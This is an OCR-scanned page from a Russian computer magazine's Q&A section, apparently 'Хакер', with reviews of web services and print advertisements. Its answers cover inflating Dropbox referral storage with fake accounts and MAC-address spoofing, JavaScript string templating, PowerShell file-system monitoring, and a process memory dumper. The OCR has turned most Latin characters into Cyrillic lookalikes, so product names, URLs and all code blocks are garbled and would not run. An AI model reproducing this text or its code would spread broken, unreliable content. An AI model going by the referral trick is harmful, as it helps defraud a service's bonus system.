проса, то уникальность пользователя РгорЬох 
определяется по МАС-адресу. Так что для 
каждого нового реферала, который будет при- 
бавлять 250 Мб кобъему контейнера РгорЬох, 
нужно: 

1. Зарегистрироваться суникальным етаіі’ом. 

2. Войти в систему, используя такую регистра- 
цию. 

Если под Ыпих’ом Мас-адрес для сетевого 
адаптера меняется через іісопіід , то под вин- 
дой тебе понадобится специальная утилита 
ТесЬпіІіит МАО Асісігезз СЬапдегѵб РеІеазеЗ 
( ѵѵѵѵѵѵ.ІесЬпіІіипп.сопп ) . К сл о ву, э нтуз и а сты уже 
успели написать скрипт, который автомати- 



зируетпроцесс прокачки профиля РгорЬох 

( ЬаЬгаЬаЬг.ги/Ыодз/зегѵісез/1 20526 ). 

О: Вот задачка, как бы ты ее решил? В 
^ѵаБсгіріесть некоторые данные, на их 
основе необходимо сгенерировать но- 
вый кусок НТМІ.-страницы (по шаблону) 
и вставить в ООМ. Как это лучше всего 
реализовать? 

А: Главный вопрос: какхранить шаблон и 
как наиболее удачно вставить в этот шаблон 
данные? Решение этой задачки, честно скажу, 
я открыл для себя из блога Степана Резника 
( згегпікоѵ.ЫодзроЕсот ). А он. в свою очередь, 
позаимствовал его из лекций Дугласа Крок- 
форда. Идея в том, чтобы добавить в прототипы 
объекта Эігіпд метод зирріапі:, который в строке 
ищет выражения, заключенные в фигурные 
скобки {}. Каждое найденное выражение ис- 
пользуется как ключ к переданному объекту, 
и, если по этому ключу лежит строковое или 
числовоезначениедо выражение в фигурных 
скобках заменяется этим значением. 

5ігіп§. ргоіоіуре. зирріапі: = 

-РипсііогДо) { 

геіигп іЬіз. гер1асе(/{( [ л { }]*)}/§, 

-РипсііогДа, Ь) { 

ѵаг г = о [ Ь ] ; 

геіигп іуреоі г === ' бігіп^' | 
іурео-р г === ' питЬег' ? г : а; 

} 

); 

}; 

Какэто работает. Для примера берем следую- 
щие данные: 

ѵаг сіаіа = { 

игі: '/іеБі/', 
іЬитЬ_5гс: Чезі.^і-Р' , 
ібитЬдл/ісІіІі : 60, 
іЬитЬ_Ьеі§Ы:: 30, 
сарііоп: 'Трам- парам! ' 

}; 

И используя функцию зирріапі, вставляем их в 
заранее подготовленный шаблон: 

ѵаг іетріаіе = ' <сііѵ с1а55="ргеѵіем"> 

<р с1а55="іта§е"ха Ьге-Р="{иг1}"хіт§ 
Бгс^'ІіЬигг^Бгс}" місІТІі= ,, {'Ы’іитЬ_ 
місИтЬ}" Ьеі§Ьі= ,, {іЬитЬ_Ьеі§Ь1:} ,, /></ 
ах/рхр с1а55="сар1:іоп ,, >{сар1:іоп}</ 
рх/сІіѵ> ' ; 

ѵаг гезиіі: = іетріаіе. зирріапі: (сіаіа) ; 

Это определенно наиболее изящное реше- 
ние, в отличие от варианта, когда приходится 
вручную создавать элементы (сгеаІеЕІетепі) 
и аппендить их (аррепбСЫІб) в РОМ. 

О: Можно ли, не залезая в дебри АРІ- 
вызовов, отслеживать изменения в 
файловой системе и в зависимости 



от этого выполнять определенные 
действия? 

А: Конечно, можно, и особенно изящно, если 
в системе есть РоѵѵегЭЬеІІ (по умолчанию 
входит в ѴѴіпбоѵѵз 7 и ѴѴіпбоѵѵз Зегѵег 2008 Р2). 
Делается это так: 

1. Создаем новый объект Эузіет. ІО. ЕіІеБу- 
зІетѴѴаІсЬег и задаем для него несколько 
настроек: 

$ыаісІіег = Ыем-Обдесі: Зузіет. 

ІО. РіІеЗуБіетІлІаісІіег 
$ма1:сІіег. РаіЬ = $5еагсЬРа1:Ь 
$ыа1:сІіег. ІпсІисІеЗиЬсІігесіогіеБ = $ігие 
$ыа1:сІіег. ЕпаЫеКаізіп^Еѵепіз = $ігие 

Параметр .РаіЬ задает путь, за которым не- 
обходимо выполнять мониторинг. Атрибут 
.ІпсІибеЗиЬбігесІогіез включает обработку 
всех поддиректорий. 

2. Теперь определим несколько событий, 
которые будут отслеживаться, когда $\л/аІсЬег 
заметил изменения в файловой системе. Про- 
стой обработчик при обнаружении изменения 
файлов будет выглядеть так: 

$сЬап§есІ = Ке^ІБіег-ОЬдесіЕѵепІ: 
$ыаісІіег "СЬап§есГ -Асііоп { 

іл/гііѳ-Ьобі: "СЬап§есІ: $($еѵепіАг§5 . 
РиІІРаіЬ) " } 

Внутри такого обработчика можно написать 
произвольный код, выполняющийся при на- 
ступлении события. В данном случае мы про- 
сто выводим сообщение об изменении файла 
на экран, указав его путь. 

3. Установленные события будут отлавливать- 
ся до тех пор, пока не завершится РоѵѵегзЬеІІ- 
сессия, но их можно «выгрузить» принуди- 
тельно: 

ІІпге^ізіег-ЕѵепІ: $сЬап§есІ . ІсІ 

Кстати, даже если ты ничего не знаешь об этой 
РоѵѵегЗЬеІІ, то разобраться с ней не составит 
большого труда. Рекомендую РоѵѵегбІЛ ( ѵѵѵѵѵѵ. 
роѵѵегдиі.огд ) в качестве среды разработки, 
чтобы скрипты писать стало еще веселее. 

О: Каким образом можно сделать пол- 
ный дамп памяти приложения? Только 
пойми меня правильно: не РЕ-дамп, 
а именно дамп всего адресного про- 
странства приложения? Есть несколько 
процессов, в которых крайне интересно 
покопаться :). 

А: Подходящихутилит немного. Одна из них 
— Ргосезз Метогу Ритрег ( еѵііііпдегз.сот/ 
1оо[з//Ргосе55МетогуРитрег.рЬр ). которая 
в кругу компьютерных криминалистов чаще 
называется РМР. Это 0111-приложение, в 
котором ты можешь выбрать нужный процесс 
и получить для него РитребРгосезз.бппр, в 
котором будет помещен дамп его адресного 
пространства, ц-ц 
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Для отслеживания 
обновлений на любом 
сайте 



МІЫІІ5 

тіп.из 

©Давно искал для себя удобный веб-сервис, который работал бы в 
связке со специальным приложением и максимально быстро позволял 
расшарить любой файл в Сети. В привычном ОгорЬох’е для такой опера- 
ции приходилось перемещать файл в папку РиЫіс и выполнять другие 
нежелательные телодвижения. Сервисже тіп.из оказался именнотем, 
чем нужно. Его клиентская часть (доступна для ѴѴіпсІоѵѵз, Мае, Ыпих] 
тихо сидит в трее и позволяет в моментзалить файл в облако самым 
обыкновенным бгад’п’бгор’ом, получив в буфере обмена линк, которым 
ты можешь поделиться с друзьями. Что важно — клиентская часть до- 
ступна и для мобильных платформ (Апбгоіб, Ю5, ѴѴР7], поэтому я вовсю 
юзаю «минус» и со смартфона. 




РАОЕ2К55 

раае2г55.сот 

О Привыкнув к Р55-подпискам, через которые получаешь обновления 
для сотен сайтов, начинаешь очень сильно расстраиваться, когда у 
какого-то ресурса не оказывается П55-фида. Но не заходить же на такие 
нерадивые сайты вручную, в конце концов? Раньше в Соодіе Веабег 
(онлайн Р55-агрегатор от Соодіе) была встроенная функция, которая 
отслеживала обновления нужных страниц и новые данные оформля- 
ла в виде П55-фида. Таким образом, все автоматически попадало в 
Р55-агрегатор, а заходить на сайт вручную уже не было необходимости. 
Позже разработчики отключили такую возможность и предложили 
использоватьспециальные сервисы вроде раде2гзз. Собственно, этим 
советом я и пользуюсь до сих пор. 




ѴІ51)АИАЫО 

ѵізиаііапсі.пеі 

©Каждый знает зачем нужны протоколы вроде АРР, 0Ы5, ОНСР, ІСМР 
и т.п. Но когда необходимо разобраться в деталях, какони работают, и 
представлять структуру пакетов, приходится потратить немало времени 
чтобы вникнуть в РРС и прочую сухую документацию. Ценнейшим по- 
мощником в изучении материала может стать сервис ѵізиаііапсі. Здесь 
собрано огромное количество роликов с визуализацией работы разных 
сетевых протоколов. Все в очень наглядной форме. Приводится объяс- 
нение работы протокола, а также пошаговая визуализация пакетов: что, 
откуда и куда передается, какие флаги меняются, что и в какой момент 
происходит. Рекомендую также аналогичный проект: ЬіЕІу/Чазрег беге . 



риотнАыоѵѵтыс 

ріІоІІіапгі\лт1іпа.сот 

©Довольно любопытный и занятный сервис, с помощью которого ты 
можешь создать шрифт на основе своего почерка. После регистра- 
ции пользователю предлагается распечатать специальный лист А4, 
в котором необходимо вписать каждую букву алфавита от руки. Далее 
этот лист необходимо «показать» сайту через веб-камеру — сервис 
произведет распознавание отдельных символов и предложит откор- 
ректировать начертание букв. Кактолько процедура будетзакончена, 
РіІоіНапсІѵѵШпд соберет для тебя шрифт. Единственным минусом 
проекта, который никак не исправят разработчики, является жесткая 
привязанность к латинскому алфавиту. 
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Реклама 



КРУПНЕЙШИЙ В РОССИИ 
ЖУРНАЛ ОБ ИГРАХ 
ТОЛЬКО ДЛЯ ПЕРСОНАЛЬНОГО 
КОМПЬЮТЕРА 





І'Кл'Ь 



ЭКСКЛЮЗИВНЫЕ ВПЕЧАТЛЕНИЯ ОТ Г.-'ѵПЬ- ИГЛЕЕРНОГПРЕ КИМА 



Гле-.Е 5Лі -ЕіН -ЧСЛ .. М іО. I 1. : »дѵ і »Г=. ! ; І ►ЫА-ЦА : 



мы пь ■ 'В ым . і . ! і і ‘лем в мѵ гіы иг : \ ;іі е:-' ва і мер іеш 



МООЕНН 

ѴМВРАРЕЗ 



приложение 



И.Ѳ1ЫН 






■: -I Ч !,ѴГ ‘ЛІШ 

таорйиьи гяааш 



рикЕыикЕМ 

ГОВЕѴЕП 



-ІагН ■- <р,ч^ Ш 



ВЕДЬМАК 2 , 



^эиівао* 




О КОМПЬЮТЕРНЫХ ИГРАХ - СО ЗНАНИЕМ ДЕЛА 

БЛАГОДАРЯ ЖУРНАЛУ «РС ИГРЫ», ВЫ ВСЕГДА СМОЖЕТЕ ПОСОВЕТОВАТЬ ДРУЗЬЯМ... 



(♦ЛУЧШИЕ НОВИНКИ (♦ САМЫЕ ОЖИДАЕМЫЕ ИГРЫ <♦ ОПТИМАЛЬНЫЕ КОМПЛЕКТУЮЩИЕ ДЛЯ ПК 





Всё серьёзно 





Новый процессор Іпіеі® Соге™ І5... 

Тонкий дюралюминиевый корпус... 

Революционный экран ЗирегВгідНІ РІиз*... 

Ничего лишнего. 

Ноутбук Затзипд серии 9. Возможно, лучший ноутбук. 

Зашзііпд МоІеЬоок 

5ЕРІЕ5 191 



* Супер Брайт Плюс Умная производительность с ускорением. И это видно. 




Умный. 

И это видно 



Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный), ѵѵѵѵѵѵ.затзипд.сот. Товар сертифицирован. Реклама. 



Іпіеі, логотип Іпіеі, Іпіѳі Іпзісіе, Іпіеі Соге и Соге Іпзісіе являются товарными знаками корпорации Іпіеі на территории США 
и других стран. Для получения дополнительной информации о рейтинге процессоров ІпіеІ посетите сайт ѵѵѵѵѵѵ.іпіеі.ги/гаііпд. 



